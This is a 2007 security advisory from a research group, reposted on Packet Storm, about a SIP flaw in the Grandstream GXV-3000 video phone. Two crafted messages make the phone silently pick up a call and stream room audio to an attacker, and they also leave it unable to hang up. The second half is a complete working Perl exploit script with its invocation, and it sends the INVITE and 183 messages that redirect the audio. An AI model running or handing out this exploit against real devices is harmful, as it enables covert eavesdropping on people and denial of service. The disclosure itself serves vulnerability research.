grandstream-sip.txt

2007-08-23T00:00:00
ID PACKETSTORM:58780
Type packetstorm
Reporter Radu State
Modified 2007-08-23T00:00:00

Description

                                        
                                            `   
  
While playing with the SIP Madynes stateful fuzzer (for a description see  
http://hal.inria.fr/inria-00166947/en), we have realized that some SIP stack  
engines have serious bugs allowing to an attacker to automatically make a  
remote phone accept the call  
  
without ringing and without asking the user to take the phone from the  
hook, such that the attacker might be able to listen to all conversations  
that take place in the remote room without being noticed.  
  
  
  
One example that we can disclose (vendor was notified on 10 th May 2007)  
is the following: Grandstream SIP Phone GXV-3000  
  
  
  
  
  
MADYNES Security Advisory : SIP remote attack on Grandstream SIP Phone  
GXV-3000  
  
  
  
Date of Discovery 7 th May, 2007  
  
ID: KIPH7  
  
Background   
  
SIP is the IETF standardized (RFCs 2543 and 3261) protocol for VoIP  
signalization. SIP is an ASCII based INVITE message is used to initiate and  
maintain a communication session.   
  
  
Affected devices: Grandstream SIP Phone GXV-3000 with latest available  
firmware 1.0.1.7 Loader-- 1.0.0.6 Boot--1.0.0.18  
  
Impact :  
A malicious user can remotely eavesdrop (a remote location) and perform DOS  
on a remote phone.   
Resolution  
Fixed software will be available from the vendor and customers following  
recommended best practices (ie segregating VOIP traffic from data) will be  
protected from malicious traffic in most situations.   
  
The vulnerability is based in a sequence of two messages, where both  
messages are syntactically right, but together they turn the device in an  
inconsistent state, where the RTP is now send to the attacker/   
  
  
  
  
  
ougui@152.81.48.94:5060 is the attacker  
1005@152.81.48.88:5060 the attacked phone  
  
  
  
  
  
X ----------------------- INVITE ------------------->  
GXV-3000  
  
X <------------------ 100 Trying -----------------   
  
GXV-3000  
  
X <--------------- 180 Ringing -------------------   
  
GXV-3000  
  
X ------------- 183 Session Progress -------> GXV-3000  
  
  
  
X <-----------RTP - FLOW ------------------------ GXV-3000  
  
  
  
After these messages the device is not able to hang up so a remote DOS can  
be also done  
  
  
  
Credits:  
  
* Humberto J. Abdelnur (Ph.D Student)   
* Radu State (Ph.D)   
* Olivier Festor (Ph.D)   
  
Exploit Code :  
  
  
  
To run the exploit the file Grandstream-GXV3000.pl should be launched  
(assuming our configurations) as:  
  
  
  
perl Grandstream-GXV3000.pl 152.81.48.88 5060 humbol 152.81.48.94 5060 ougui  
  
  
  
#!/usr/bin/perl  
  
use IO::Socket::INET;  
  
die "Usage $0 <dst> <port> <username> <src> <port> <username>" unless  
($ARGV[5]);  
  
  
  
$socket=new IO::Socket::INET->new(  
  
Proto=>'udp',  
  
LocalPort => $ARGV[4],  
  
PeerPort=>$ARGV[1],  
  
PeerAddr=>$ARGV[0]);  
  
  
  
$sdp= "v=0\r  
  
o=username 0 0 IN IP4 $ARGV[3]\r  
  
s=The Funky Flow\r  
  
c=IN IP4 $ARGV[3]\r  
  
t=0 0\r  
  
m=audio 33404 RTP/AVP 3 97 0 8\r  
  
a=rtpmap:0 PCMU/8000\r  
  
a=rtpmap:3 GSM/8000\r  
  
a=rtpmap:8 PCMA/8000\r  
  
a=rtpmap:97 iLBC/8000\r  
  
a=fmtp:97 mode=30\r\n";  
  
$sdplen= length $sdp;  
  
$msg= "INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r  
  
Via: SIP/2.0/UDP $ARGV[3];branch=001;rport=$ARGV[4]\r  
  
From: <sip:$ARGV[5]\@$ARGV[3]>\r  
  
To: <sip:$ARGV[2]\@$ARGV[0]>\r  
  
Contact: <sip:$ARGV[5]\@$ARGV[3]>\r  
  
Call-ID: ougui\@$ARGV[3]\r  
  
CSeq: 10419 INVITE\r  
  
Max-Forwards: 70\r  
  
Content-Type: application/sdp\r  
  
Content-Length: $sdplen\r  
  
\r  
  
$sdp";  
  
$socket->send($msg);  
  
sleep(3);  
  
$msg=   
  
"SIP/2.0 183 Session Progress\r  
  
Via: SIP/2.0/UDP $ARGV[3];branch=001;rport=$ARGV[4]\r  
  
From: <sip:$ARGV[5]\@$ARGV[3]>\r  
  
To: <sip:$ARGV[2]\@$ARGV[0]>\r  
  
Call-ID: ougui\@$ARGV[3]\r  
  
CSeq: 10419 INVITE\r  
  
Max-Forwards: 70\r  
  
Contact: <sip:$ARGV[5]\@$ARGV[3]>\r  
  
Content-Type: application/sdp\r  
  
Content-Length: $sdplen\r  
  
\r  
  
$sdp";  
  
  
  
$socket->send($msg);  
  
  
  
`